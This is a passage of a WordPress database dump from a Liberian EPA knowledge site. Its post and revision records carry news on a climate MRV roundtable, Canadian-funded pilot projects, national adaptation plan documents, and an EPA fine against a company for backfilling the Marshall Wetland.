Development Planning.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She explained the success of the bilateral meetings and disclosed that the project would run for a period of three years and emphasized ‘this project is about implementation’.&nbsp;&nbsp; &nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also speaking at the opening of the program, the United Nations Convention on Climate Change (UNFCCC) national Focal Point for Liberia, Mr. Jefferson F. Nyandibo told participants that the roundtable meeting isn’t an ordinary workshop, but a gathering of some of the country’s brightest minds.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He stressed the need for participants to use the roundtable to develop a roadmap to track climate finance.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Representing the Ministry of Finance and Development Planning at the seminar, Assistant Finance and Development Planning Minister Benedict Kolubah lauded EPA Executive Director Tarpeh and said through his leadership the issue of the Environment has been brought to the front burner as a critical development issue.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Minister Kolubah disclosed that the presidency has also shown immense interest in issues related to the environment and attributed it to Tarpeh’s stewardship.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to him, the Pro Poor Agency for Prosperity and Development (PAPD) has also outlined clearly the relevance of environmental issues to development.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“There is a climate change unit underway to be established at the Ministry of Finance and Development Planning,” Assistant Minister Kolubah disclosed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He thanked the Canadian Government for its support to Liberia regarding the Climate MRV process.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Assistant Internal Affairs Minister, Abu-Bakr Bah explained that the impact of environmental degradation is quite visible in Liberia and requested the EPA and partners to support capacity building for urban cities to respond to climate change impacts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also speaking, Deputy Agriculture Minister, George Tee Forpoh stressed the need for the country to harness expertise to build an effective MRV system for Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He promised that the Ministry of Agriculture will support Liberia’s drive to ensure that the country has an effective MRV process.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Assistant Mines and Energy, Johnson S. Willabo noted that Liberia holds a vast percentage of the upper Guinea Forest and disclosed that there are ongoing consultations and steps taken by the government to ensure that the forest is managed in a sustainable way to attract climate investments.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The three-day Evergreen Roundtable is expected to end on Friday, January 20,2023 with participant being able to described Liberia’s NDC target and the priority sectors for GHG mitigation actions; identified Liberia’s key challenges toward achieving the NDC and SDCs targets; understand the difference between MRV and GHG emissions, the MRV of Mitigation Actions and the MRV of Climate Finance; identified the key actors and their roles in achieving Liberia\'s NOC; designed and propose activities within the Evergreen Roadmap that strengthen Liberia\'s commitment and capacity to achieve the ND and related SD targets and; understand the roadmap in the development of the Liberia\'s MRV system and relevant MRV stakeholders.</p>\n<!-- /wp:paragraph -->','Liberia Hosts Three-Day Round-Table Dialogue On Climate Finance, Governance, and Measuring Reporting Verification','','inherit','closed','closed','','5256-revision-v1','','','2023-01-19 16:59:33','2023-01-19 16:59:33','',5256,'https://ekmsliberia.info/?p=5257',0,'revision','',0),(5258,42,'2023-01-19 17:01:36','2023-01-19 17:01:36','','MRVRoundtable','','inherit','open','closed','','mrvroundtable','','','2023-01-19 17:01:36','2023-01-19 17:01:36','',5256,'https://ekmsliberia.info/wp-content/uploads/2023/01/MRVRoundtable.jpg',0,'attachment','image/jpeg',0),(5259,42,'2023-01-24 11:09:15','2023-01-24 11:09:15','<span id=\"page7R_mcid1\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">Like many other countries globally, Liberia is increasingly</span> <span dir=\"ltr\" role=\"presentation\">experiencing physical changes to its </span><span dir=\"ltr\" role=\"presentation\">climate stemming from anthropogenic global warming</span> <span dir=\"ltr\" role=\"presentation\">1</span> <span dir=\"ltr\" role=\"presentation\">.</span> <span dir=\"ltr\" role=\"presentation\">These</span> <span dir=\"ltr\" role=\"presentation\">physical changes</span> <span dir=\"ltr\" role=\"presentation\">include</span> <span dir=\"ltr\" role=\"presentation\">warmer </span><span dir=\"ltr\" role=\"presentation\">temperatures, increases in annual rainfall, and increases in the frequency of heavy rainfall events</span><span dir=\"ltr\" role=\"presentation\">. Though </span><span dir=\"ltr\" role=\"presentation\">historically Lib</span><span dir=\"ltr\" role=\"presentation\">eria’s contribution to atmospheric greenhouse gas (GHG) concentrations has been negligible, </span><span dir=\"ltr\" role=\"presentation\">our country is unfortunately confronted with the daunting challenge of adapting to these new climatic </span><span dir=\"ltr\" role=\"presentation\">conditions and their impacts. </span></span><span id=\"page7R_mcid2\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">Recognizing the implicati</span><span dir=\"ltr\" role=\"presentation\">on of climate change for its national development and in response to its </span><span dir=\"ltr\" role=\"presentation\">international commitments, the Government of Liberia (GoL), through the Environmental Protection </span><span dir=\"ltr\" role=\"presentation\">Agency (EPA), has taken various actions to support climate change adaptation planning</span> <span dir=\"ltr\" role=\"presentation\">with several</span><br role=\"presentation\" /><span dir=\"ltr\" role=\"presentation\">climate</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">related policies.</span> <span dir=\"ltr\" role=\"presentation\">Liberia has undertaken climate vulnerability assessments and risk on several </span><span dir=\"ltr\" role=\"presentation\">priority sectors to support these policies, including coastal zones, agriculture, waste management, forestry, </span><span dir=\"ltr\" role=\"presentation\">and fisheries. Under the EPA\'</span><span dir=\"ltr\" role=\"presentation\">s guidance and support from the United Nations Development Programme </span><span dir=\"ltr\" role=\"presentation\">(UNDP), the GoL has prepared this National Adaptation Plan (NAP) framework to guide and advance its </span><span dir=\"ltr\" role=\"presentation\">National Adaptation Plan process medium</span><span dir=\"ltr\" role=\"presentation\">-</span> <span dir=\"ltr\" role=\"presentation\">and long</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">term adaptation needs in a coherent a</span><span dir=\"ltr\" role=\"presentation\">nd coordinated </span><span dir=\"ltr\" role=\"presentation\">manner.</span></span>','Liberia\'s National Adaptation Plan 2020-2023','','publish','closed','closed','','liberias-national-adaptation-plan-2020-2023','','','2023-01-24 11:09:15','2023-01-24 11:09:15','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5259',26,'document','',0),(5260,42,'2023-01-23 14:28:20','2023-01-23 14:28:20','','IMG_E1901','','inherit','open','closed','','img_e1901','','','2023-01-23 14:28:20','2023-01-23 14:28:20','',5259,'https://ekmsliberia.info/wp-content/uploads/2023/01/IMG_E1901.jpg',0,'attachment','image/jpeg',0),(5261,42,'2023-01-23 14:28:37','2023-01-23 14:28:37','','LIBERIA_ NAP_ FINAL_ DOCUMENT','','inherit','open','closed','','liberia_-nap_-final_-document-2','','','2023-01-23 14:28:37','2023-01-23 14:28:37','',5259,'https://ekmsliberia.info/wp-content/uploads/2023/01/LIBERIA_-NAP_-FINAL_-DOCUMENT.pdf',0,'attachment','application/pdf',0),(5262,42,'2023-01-24 11:08:46','2023-01-24 11:08:46','','nap','','inherit','open','closed','','nap-3','','','2023-01-24 11:08:46','2023-01-24 11:08:46','',5259,'https://ekmsliberia.info/wp-content/uploads/2023/01/nap.png',0,'attachment','image/png',0),(5263,42,'2023-01-24 11:09:15','2023-01-24 11:09:15','<span id=\"page7R_mcid1\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">Like many other countries globally, Liberia is increasingly</span> <span dir=\"ltr\" role=\"presentation\">experiencing physical changes to its </span><span dir=\"ltr\" role=\"presentation\">climate stemming from anthropogenic global warming</span> <span dir=\"ltr\" role=\"presentation\">1</span> <span dir=\"ltr\" role=\"presentation\">.</span> <span dir=\"ltr\" role=\"presentation\">These</span> <span dir=\"ltr\" role=\"presentation\">physical changes</span> <span dir=\"ltr\" role=\"presentation\">include</span> <span dir=\"ltr\" role=\"presentation\">warmer </span><span dir=\"ltr\" role=\"presentation\">temperatures, increases in annual rainfall, and increases in the frequency of heavy rainfall events</span><span dir=\"ltr\" role=\"presentation\">. Though </span><span dir=\"ltr\" role=\"presentation\">historically Lib</span><span dir=\"ltr\" role=\"presentation\">eria’s contribution to atmospheric greenhouse gas (GHG) concentrations has been negligible, </span><span dir=\"ltr\" role=\"presentation\">our country is unfortunately confronted with the daunting challenge of adapting to these new climatic </span><span dir=\"ltr\" role=\"presentation\">conditions and their impacts. </span></span><span id=\"page7R_mcid2\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">Recognizing the implicati</span><span dir=\"ltr\" role=\"presentation\">on of climate change for its national development and in response to its </span><span dir=\"ltr\" role=\"presentation\">international commitments, the Government of Liberia (GoL), through the Environmental Protection </span><span dir=\"ltr\" role=\"presentation\">Agency (EPA), has taken various actions to support climate change adaptation planning</span> <span dir=\"ltr\" role=\"presentation\">with several</span><br role=\"presentation\" /><span dir=\"ltr\" role=\"presentation\">climate</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">related policies.</span> <span dir=\"ltr\" role=\"presentation\">Liberia has undertaken climate vulnerability assessments and risk on several </span><span dir=\"ltr\" role=\"presentation\">priority sectors to support these policies, including coastal zones, agriculture, waste management, forestry, </span><span dir=\"ltr\" role=\"presentation\">and fisheries. Under the EPA\'</span><span dir=\"ltr\" role=\"presentation\">s guidance and support from the United Nations Development Programme </span><span dir=\"ltr\" role=\"presentation\">(UNDP), the GoL has prepared this National Adaptation Plan (NAP) framework to guide and advance its </span><span dir=\"ltr\" role=\"presentation\">National Adaptation Plan process medium</span><span dir=\"ltr\" role=\"presentation\">-</span> <span dir=\"ltr\" role=\"presentation\">and long</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">term adaptation needs in a coherent a</span><span dir=\"ltr\" role=\"presentation\">nd coordinated </span><span dir=\"ltr\" role=\"presentation\">manner.</span></span>','Liberia\'s National Adaptation Plan 2020-2023','','inherit','closed','closed','','5259-revision-v1','','','2023-01-24 11:09:15','2023-01-24 11:09:15','',5259,'https://ekmsliberia.info/?p=5263',0,'revision','',0),(5264,42,'2023-01-24 11:15:02','2023-01-24 11:15:02','Liberia’s national development document, The Pro-Poor Agenda for Prosperity and Development 2018 to 2023 recognizes the impacts of climate change on development, and calls for the integration of climate change considerations and the building of resilience into the\r\ncountry’s national development programs and plans. The National Policy and Response Strategy to Climate Change (NPRSCC) was launched in 2018 to enable better coordination of climate change work; and to enhance efforts related to Liberia’s National Adaptation Plan (NAP) and Nationally Determined Contribution (NDC). Liberia is strengthening her capacity to measure, track and report adaptation data through a Capacity Building Initiative for Transparency (CBIT) initiative that is implemented through the Environmental Protection Agency of Liberia (EPA).','Liberia’s First Adaptation Communication to the United Nations Framework Convention on Climate Change (UNFCCC)','','publish','closed','closed','','liberias-first-adaptation-communication-to-the-united-nations-framework-convention-on-climate-change-unfccc','','','2023-01-24 11:15:02','2023-01-24 11:15:02','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5264',25,'document','',0),(5265,42,'2023-01-24 11:12:29','2023-01-24 11:12:29','','doc','','inherit','open','closed','','doc-2','','','2023-01-24 11:12:29','2023-01-24 11:12:29','',5264,'https://ekmsliberia.info/wp-content/uploads/2023/01/doc.png',0,'attachment','image/png',0),(5266,42,'2023-01-24 11:13:41','2023-01-24 11:13:41','','First_Adaptation_Communication_AdCom_LIBERIA','','inherit','open','closed','','first_adaptation_communication_adcom_liberia','','','2023-01-24 11:13:41','2023-01-24 11:13:41','',5264,'https://ekmsliberia.info/wp-content/uploads/2023/01/First_Adaptation_Communication_AdCom_LIBERIA.pdf',0,'attachment','application/pdf',0),(5267,42,'2023-01-24 11:14:03','2023-01-24 11:14:03','Liberia’s national development document, The Pro-Poor Agenda for Prosperity and Development 2018 to 2023 recognizes the impacts of climate change on development, and calls for the integration of climate change considerations and the building of resilience into the\r\ncountry’s national development programs and plans. The National Policy and Response Strategy to Climate Change (NPRSCC) was launched in 2018 to enable better coordination of climate change work; and to enhance efforts related to Liberia’s National Adaptation Plan (NAP) and Nationally Determined Contribution (NDC). Liberia is strengthening her capacity to measure, track and report adaptation data through a Capacity Building Initiative for Transparency (CBIT) initiative that is implemented through the Environmental Protection Agency of Liberia (EPA).','Liberia’s First Adaptation Communication to the United Nations Framework Convention on Climate Change (UNFCCC)','','inherit','closed','closed','','5264-revision-v1','','','2023-01-24 11:14:03','2023-01-24 11:14:03','',5264,'https://ekmsliberia.info/?p=5267',0,'revision','',0),(5268,42,'2023-01-24 19:38:43','2023-01-24 19:38:43','<!-- wp:paragraph -->\n<p>The Government of Liberia through the Environmental Protection Agency (EPA) in collaboration with The Nature Compact (TNC) over the weekend concluded a three-day round-table dialogue on Measuring Reporting Verification (MRV), Climate Finance, and Governance in Margibi County with the signing and approval of three pilot projects in the amount of US$ 900,000.00  from the Canadian Government through NovaSphare to strengthen multi-level climate governance and institutional arrangements in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Held at Farmington Hotel, the three-day event attracted officials from the EPA, along with national officials from other ministries, including the Forestry Development Authority, the Ministry of Mines and Energy, the Ministry of Finance and Development Planning, Liberia’s Institute of Statistics and Geo-Information Services, Ministry of Agriculture and Ministry of Internal Affairs, non-governmental organizations and civil society organizations and institutions of higher learning.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The three projects, which were signed and approved also seek to institutionalize national Measuring Reporting Verification (MRV) are intended to develop a national MRV curriculum for training at universities, establish an inter-ministerial climate committee, and for the expansion of the MRV community of practices at both national and subnational levels.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>EPA Deputy Executive Director, Randall M. Dobayou said that Canadian-based, Novasphare has agreed to fund all three pilot projects.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>NovaSphere is a Canadian-based institution. The institution’s mission is to engage with stakeholders and create solutions to climate change and sustainability, by encouraging and promoting cooperation and collaboration among the public and organizations; gathering, creating and exchanging information with the public and organizations; performing research, including developing and managing research projects; developing and managing conferences, symposia, meetings, exhibitions, and events; promoting the study of and providing training, support, development of governance, and standards of practice and programs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to Dobayou, the project to develop a national MRV curriculum for training at universities is valued at US$ 400,000.00, while the project to establish an inter-ministerial climate committee worth US$ 200,000.00.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The project to expand the MRV Community of practices at both national and subnational levels cost US$ 300,000.00.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Lisa Marroquin, Novasphare Vice President, and Program Director corroborated Dobayou’s assertion that her organization would fully fund the pilot projects.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Madam Marroquin explained that the three projects would lay the foundation for additional projects and said “we are happy to work with you on the success of these projects.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In June 2018, the Government of Canada’s federal Department of Environment and Climate Change (ECCC) engaged NovaSphere to deliver a $1.1M project for “Support to enhance Measurement, Reporting and Verification with the Pacific Alliance” (Chile, Colombia, Mexico, and Peru).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The original project was expanded to $4. 3M in August 2019 to include 15 countries in West Africa (Benin, Burkina Faso, Cabo Verde, Côte d’Ivoire, the Gambia, Ghana, Guinea, Guinea-Bissau, Liberia, Mali, Niger, Nigeria, Senegal, Sierra Leone, and Togo).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The expanded project worked closely with partners to help define regional priorities to address greenhouse gas and SLCP emissions and to pursue opportunities for harmonizing measurement, reporting, and verification (MRV) systems.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Canadian government funding supported cooperation within and between the two regions, to facilitate the exchange of best practices that align with regional MRV priorities and help seed opportunities for the replication of best practices generated from bilateral projects in the region. The project completed in March 2022.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The project established an MRV Program with the mandate to provide technical and policy support to strengthen climate MRV systems for climate finance, mitigation actions, and emission inventories.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The main activities of the MRV Program included a series of consultations and research, baseline scoping reports, technical training, development of MRV communities of practice, a series of reports and South-South knowledge sharing, and development of a knowledge base. The MRV program successfully laid the groundwork for strengthened climate governance within the partner countries.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The MRV Program also facilitated the fundamental connectivity and institutional arrangements necessary for the effective and efficient sovereign, domestic climate MRV systems.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In a related development, the Liberian Government through the EPA has honored and gowned Madam Marroquin, Scott Muller, a consultant with NovaSphere, and Jill Mills for their contributions to the fight against climate change and environmental degradation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Performing the honoring ritual, EPA Executive Director, Prof. Wilson Tarpeh said the ceremony is a tradition for Liberia to honor friends and partners they value and see as substantive.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Prof. Tarpeh conferred the honors on the three Canadians and named them after three Liberian traditional leaders who respectively contributed to peace in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Muller was named Chief Tuazamah, a once powerful and influential paramount chief from northern Nimba County. Chief Tuazamah was passionate about education and helped with the peace process in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Madam Marroquin was named Chief Mama Torma. Mama Torma was a chief Zoe who was very instrumental in the peace process. She is recorded in history for her relentless corporation to minimize the practice of female genital mutilation. She quickly transformed FGM bush into a learning center.&nbsp;&nbsp; &nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Jill was named Paramount Chief Lowa, a powerful female chief elected in 1975. She served for 11 years and became a role model for peace and reconciliation in Bong County. She is continuously remembered as a heroin in Bong County referenced for designating Katawee, a tourist site in Bong County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In remarks, the three Canadians appreciated the honors bestowed on them and promised to continuously contribute to the country’s climate change fight.</p>\n<!-- /wp:paragraph -->','EPA Secures Three Projects Value US$ 900,000 through Canada to Institutionalize National Measuring Reporting Verification','','publish','open','open','','epa-secures-three-projects-value-us-900000-through-canada-to-institutionalize-national-measuring-reporting-verification','','','2023-01-24 19:38:48','2023-01-24 19:38:48','',0,'https://ekmsliberia.info/?p=5268',91,'post','',0),(5269,42,'2023-01-24 19:38:43','2023-01-24 19:38:43','<!-- wp:paragraph -->\n<p>The Government of Liberia through the Environmental Protection Agency (EPA) in collaboration with The Nature Compact (TNC) over the weekend concluded a three-day round-table dialogue on Measuring Reporting Verification (MRV), Climate Finance, and Governance in Margibi County with the signing and approval of three pilot projects in the amount of US$ 900,000.00  from the Canadian Government through NovaSphare to strengthen multi-level climate governance and institutional arrangements in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Held at Farmington Hotel, the three-day event attracted officials from the EPA, along with national officials from other ministries, including the Forestry Development Authority, the Ministry of Mines and Energy, the Ministry of Finance and Development Planning, Liberia’s Institute of Statistics and Geo-Information Services, Ministry of Agriculture and Ministry of Internal Affairs, non-governmental organizations and civil society organizations and institutions of higher learning.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The three projects, which were signed and approved also seek to institutionalize national Measuring Reporting Verification (MRV) are intended to develop a national MRV curriculum for training at universities, establish an inter-ministerial climate committee, and for the expansion of the MRV community of practices at both national and subnational levels.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>EPA Deputy Executive Director, Randall M. Dobayou said that Canadian-based, Novasphare has agreed to fund all three pilot projects.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>NovaSphere is a Canadian-based institution. The institution’s mission is to engage with stakeholders and create solutions to climate change and sustainability, by encouraging and promoting cooperation and collaboration among the public and organizations; gathering, creating and exchanging information with the public and organizations; performing research, including developing and managing research projects; developing and managing conferences, symposia, meetings, exhibitions, and events; promoting the study of and providing training, support, development of governance, and standards of practice and programs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to Dobayou, the project to develop a national MRV curriculum for training at universities is valued at US$ 400,000.00, while the project to establish an inter-ministerial climate committee worth US$ 200,000.00.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The project to expand the MRV Community of practices at both national and subnational levels cost US$ 300,000.00.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Lisa Marroquin, Novasphare Vice President, and Program Director corroborated Dobayou’s assertion that her organization would fully fund the pilot projects.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Madam Marroquin explained that the three projects would lay the foundation for additional projects and said “we are happy to work with you on the success of these projects.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In June 2018, the Government of Canada’s federal Department of Environment and Climate Change (ECCC) engaged NovaSphere to deliver a $1.1M project for “Support to enhance Measurement, Reporting and Verification with the Pacific Alliance” (Chile, Colombia, Mexico, and Peru).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The original project was expanded to $4. 3M in August 2019 to include 15 countries in West Africa (Benin, Burkina Faso, Cabo Verde, Côte d’Ivoire, the Gambia, Ghana, Guinea, Guinea-Bissau, Liberia, Mali, Niger, Nigeria, Senegal, Sierra Leone, and Togo).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The expanded project worked closely with partners to help define regional priorities to address greenhouse gas and SLCP emissions and to pursue opportunities for harmonizing measurement, reporting, and verification (MRV) systems.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Canadian government funding supported cooperation within and between the two regions, to facilitate the exchange of best practices that align with regional MRV priorities and help seed opportunities for the replication of best practices generated from bilateral projects in the region. The project completed in March 2022.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The project established an MRV Program with the mandate to provide technical and policy support to strengthen climate MRV systems for climate finance, mitigation actions, and emission inventories.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The main activities of the MRV Program included a series of consultations and research, baseline scoping reports, technical training, development of MRV communities of practice, a series of reports and South-South knowledge sharing, and development of a knowledge base. The MRV program successfully laid the groundwork for strengthened climate governance within the partner countries.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The MRV Program also facilitated the fundamental connectivity and institutional arrangements necessary for the effective and efficient sovereign, domestic climate MRV systems.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In a related development, the Liberian Government through the EPA has honored and gowned Madam Marroquin, Scott Muller, a consultant with NovaSphere, and Jill Mills for their contributions to the fight against climate change and environmental degradation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Performing the honoring ritual, EPA Executive Director, Prof. Wilson Tarpeh said the ceremony is a tradition for Liberia to honor friends and partners they value and see as substantive.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Prof. Tarpeh conferred the honors on the three Canadians and named them after three Liberian traditional leaders who respectively contributed to peace in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Muller was named Chief Tuazamah, a once powerful and influential paramount chief from northern Nimba County. Chief Tuazamah was passionate about education and helped with the peace process in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Madam Marroquin was named Chief Mama Torma. Mama Torma was a chief Zoe who was very instrumental in the peace process. She is recorded in history for her relentless corporation to minimize the practice of female genital mutilation. She quickly transformed FGM bush into a learning center.&nbsp;&nbsp; &nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Jill was named Paramount Chief Lowa, a powerful female chief elected in 1975. She served for 11 years and became a role model for peace and reconciliation in Bong County. She is continuously remembered as a heroin in Bong County referenced for designating Katawee, a tourist site in Bong County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In remarks, the three Canadians appreciated the honors bestowed on them and promised to continuously contribute to the country’s climate change fight.</p>\n<!-- /wp:paragraph -->','EPA Secures Three Projects Value US$ 900,000 through Canada to Institutionalize National Measuring Reporting Verification','','inherit','closed','closed','','5268-revision-v1','','','2023-01-24 19:38:43','2023-01-24 19:38:43','',5268,'https://ekmsliberia.info/?p=5269',0,'revision','',0),(5271,42,'2023-01-11 13:15:00','2023-01-11 13:15:00','<!-- wp:paragraph -->\n<p>To read more details, please click on the link <strong><em><a href=\"https://www.elephantprotectioninitiative.org/post/randall-dobayou\" data-type=\"URL\" data-id=\"https://www.elephantprotectioninitiative.org/post/randall-dobayou\">https://www.elephantprotectioninitiative.org/post/randall-dobayou</a> </em></strong></p>\n<!-- /wp:paragraph -->','Elephant Protection Initiative\'s January Friend of the Month is Randall Dobayou, Deputy Executive Director of the Environmental Protection Agency Liberia','','publish','open','open','','elephant-protection-initiatives-january-friend-of-the-month-is-randall-dobayou-deputy-executive-director-of-the-environmental-protection-agency-liberia','','','2023-02-01 10:24:37','2023-02-01 10:24:37','',0,'https://ekmsliberia.info/?p=5271',90,'post','',0),(5272,42,'2023-02-01 10:20:50','2023-02-01 10:20:50','','ded','','inherit','open','closed','','ded-5','','','2023-02-01 10:20:50','2023-02-01 10:20:50','',5271,'https://ekmsliberia.info/wp-content/uploads/2023/02/ded.jpg',0,'attachment','image/jpeg',0),(5273,42,'2023-02-01 10:23:00','2023-02-01 10:23:00','<!-- wp:paragraph -->\n<p>To read more details, please click on the link <a href=\"https://www.elephantprotectioninitiative.org/post/randall-dobayou\" data-type=\"URL\" data-id=\"https://www.elephantprotectioninitiative.org/post/randall-dobayou\">https://www.elephantprotectioninitiative.org/post/randall-dobayou</a> </p>\n<!-- /wp:paragraph -->','Elephant Protection Initiative\'s January Friend of the Month is Randall Dobayou, Deputy Executive Director of the Environmental Protection Agency Liberia','','inherit','closed','closed','','5271-revision-v1','','','2023-02-01 10:23:00','2023-02-01 10:23:00','',5271,'https://ekmsliberia.info/?p=5273',0,'revision','',0),(5274,42,'2023-02-01 10:24:08','2023-02-01 10:24:08','<!-- wp:paragraph -->\n<p>To read more details, please click on the link <strong><em><a href=\"https://www.elephantprotectioninitiative.org/post/randall-dobayou\" data-type=\"URL\" data-id=\"https://www.elephantprotectioninitiative.org/post/randall-dobayou\">https://www.elephantprotectioninitiative.org/post/randall-dobayou</a> </em></strong></p>\n<!-- /wp:paragraph -->','Elephant Protection Initiative\'s January Friend of the Month is Randall Dobayou, Deputy Executive Director of the Environmental Protection Agency Liberia','','inherit','closed','closed','','5271-revision-v1','','','2023-02-01 10:24:08','2023-02-01 10:24:08','',5271,'https://ekmsliberia.info/?p=5274',0,'revision','',0),(5276,42,'2023-02-09 11:40:34','2023-02-09 11:40:34','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency of Liberia (EPA) has fined Sino Liberia Investment US$ 35,000 for grossly violating the Environmental Protection and Management Law (EPML) of Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Sino Liberia Investment was found liable for backfilling the Marshall Wetland in Schieffelin, Margibi County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Marshall Wetland is one of Liberia’s wetlands of international importance under the RAMSAR Convention, which seeks to protect wetlands ecosystems worldwide.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to the EPA, the unauthorized backfilling of the Marshall Wetland undermines Liberia’s commitment as a party to the RAMSAR Convention by ensuring sustainable wetland protection and violates section 75 of the EPML.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In a notice to Sino Liberia Investment dated January 30, 2023, the EPA said commencing a project without authorization from the EPA is contrary to Part III, Section 6 of the EPML, and Section 38 of the Environmental Protection Agency Act.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Recently, the EPA temporarily halted Sino Liberia Investment operation for the violation, but the company violated the halt order by damaging the barrier tape erected by environmental inspectors and continuing the construction of a concrete fence within the wetland, amounting to a violation of Section 95, Subsection 3 of the EPML.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“In view of the above counts of violations, the management of Sino Liberia Investment is hereby served with this environmental \"restoration order\" in keeping with Sections 90, and 91 of the EPML as well as Section 38 of the EPA Act.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA mandates that within 21 days, Sino Liberia shall remediate and prevent further harm to the environment by stopping the backfilling and construction of the fence in the wetland.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The company is also mandated to develop and submit an environmental restoration plan for approval through a third-party independent environmental consulting firm and prohibit further degradation and pollution of the Marshall Wetland.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Sino Liberia Investment is mandated to ensure the full restoration and reclamation of the degraded and polluted wetland ecosystem, and the requirements for the development and implementation of this \"restoration order\" shall be consistent with Sections 90 and 91 of the EPML.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The Management of Sino Liberia Investment Quarry 